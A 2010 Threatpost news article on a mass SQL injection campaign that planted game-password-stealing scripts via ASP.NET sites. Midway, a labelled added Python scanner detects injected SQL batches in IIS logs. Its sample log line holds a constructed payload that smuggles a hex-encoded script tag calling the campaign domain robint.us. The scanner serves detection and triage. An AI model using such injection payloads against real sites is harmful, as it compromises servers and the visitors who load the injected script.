June 14, 2010, 3:37PM

SQL Injection Attacks Aimed at Stealing Gaming Credentials, Experts Say

The mass SQL injection attack that has been ongoing for a week or so now is designed mainly to steal credentials for online games and is quite well planned and organized, experts say.

The attack, which has been using two specific domains as part of a widespread SQL injection campaign, is targeting sites running ASP.NET applications and using SQL injection to compromise the applications and plant malicious code on the back-end servers, according to an analysis by researchers at Armorize, a Web application security company.

The vulnerability being used in the attack is a flaw in Adobe Flash, which was publicized earlier this month and patched late last week by Adobe. Here's how the attack works:

Server-side:
1. Attack vectors used in the mass SQL injections were targeted and specific: pre-scanning took place beforehand, with vectors waiting to be used once a 0day became available.
2. Attacks targeted ASP.NET Web applications vulnerable to SQL injection and using SQL Server as the database. We note most of the fault is attributed to the vulnerable Web application itself, not IIS, ASP.NET or SQL Server.

Client-side:
1. 0day discovered in Asia by a known group, possibly via fuzzing.
2. 0day initially used (and captured) in emails as part of targeted attacks, often against Asian personnel.
3. 0day leveraged in mass SQL injection attempts shortly after the PoC was discovered in the wild.
4. Exploit code involves mechanisms to defeat behavior-based analysis.
5. Exploit generated by CuteQQ / Anhey.
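The server-side steps above leave a trace in the Web server's own logs, which is where a site owner would start triage. The following is an added example, not code from the article or from Armorize: a small Python scanner over constructed W3C-format IIS log lines that flags query strings carrying a smuggled SQL Server batch and decodes any hex literal in them to see which host an injected script tag points at. The DECLARE/CAST/EXEC batch shape is assumed as a common signature of this attack class (the article does not detail the payload); the robint.us domain comes from the article, while the `x.js` path, the IP addresses and the log lines are constructed.

```python
import re
from urllib.parse import unquote

KNOWN_DOMAINS = {"robint.us", "2677.in"}  # the two domains the article names
# Shape of a SQL Server batch smuggled into a parameter: declare a variable,
# fill it from a hex literal via CAST, then EXEC it (assumed common signature).
SQLI_MARKERS = re.compile(r"\b(DECLARE|CAST|EXEC)\b", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{8,})")
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc=["']?https?://([^/"'>\s]+)""", re.I)

def analyse_query(query_string):
    """Return (sorted SQL markers, set of script hosts) for one URL-encoded query."""
    q = unquote(query_string)
    markers = sorted({m.group(1).upper() for m in SQLI_MARKERS.finditer(q)})
    blobs = [q]
    for match in HEX_LITERAL.finditer(q):  # decode 0x... literals so we can read them
        try:
            blobs.append(bytes.fromhex(match.group(1)).decode("latin-1"))
        except ValueError:  # odd length: not a byte string, skip it
            continue
    hosts = {h.lower() for blob in blobs for h in SCRIPT_SRC.findall(blob)}
    return markers, hosts

def scan_iis_log(lines):
    """Flag W3C-format IIS log lines whose query string carries an injected batch."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log header
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        markers, hosts = analyse_query(row.get("cs-uri-query", "-"))
        if len(markers) >= 2 or hosts:
            hits.append({"client": row.get("c-ip"), "uri": row.get("cs-uri-stem"),
                         "markers": markers, "hosts": sorted(hosts),
                         "known": sorted(hosts & KNOWN_DOMAINS)})
    return hits

# Constructed sample log (not a real capture): the second request smuggles a
# hex-encoded script tag pointing at one of the domains named in the article.
_TAG_HEX = "<script src=http://robint.us/x.js></script>".encode().hex()
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2010-06-10 03:14:07 10.0.0.5 GET /products.aspx id=42 80 - 203.0.113.9 Mozilla/4.0 200",
    "2010-06-10 03:14:09 10.0.0.5 GET /products.aspx id=42;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x" + _TAG_HEX + "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - "
    "198.51.100.7 Mozilla/4.0 200",
]
```

Running `scan_iis_log(SAMPLE_LOG)` returns one hit for the second request, naming the client IP, the three batch markers and robint.us as a known campaign domain; a real deployment would feed it the live IIS log and cross-check flagged requests against the database rows that were modified at that time.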

The attack includes some code specifically designed to evade Web application firewalls, and it is being thrown against sites running several different versions of Microsoft's IIS Web server software. The Armorize researchers say that the attacks look to be the work of a group using the name "dnf666," which launched a similar mass SQL injection campaign in March.

"DNF stands for 'Dungeon Fighter,' a popular online game in the Chinese community. It's offered in Taiwan and in China on top of the QQ platform. dnf666.net was a platform selling (illegal) plugins to these online games. Adding these together, it's no surprise that at the end of this article, our conclusion is the purpose of both robint.us and 2677.in attacks were aimed at stealing passwords to online games," they wrote in their analysis.


Comments

Your link to armorize's blog set off my AVG link scanner and disabled access to the site. Perhaps it is a false positive?

It is. AVG uses signatures. Since the post contains descriptive portions of the malware, AVG will flag it. False positive.

Off topic: Definitely not an AVG false positive; there _IS_ what is flagged, and more AVs report so. You would do better to show the malware/malicious JavaScript snippets as images, not inline JavaScript code.

No, nothing is inlined; all JavaScript code is rendered, not executed. The malicious domain is dead anyway.

The code is there for others to copy and use as signatures; that's why we're not using images.


Copyright © 2012 threatpost.com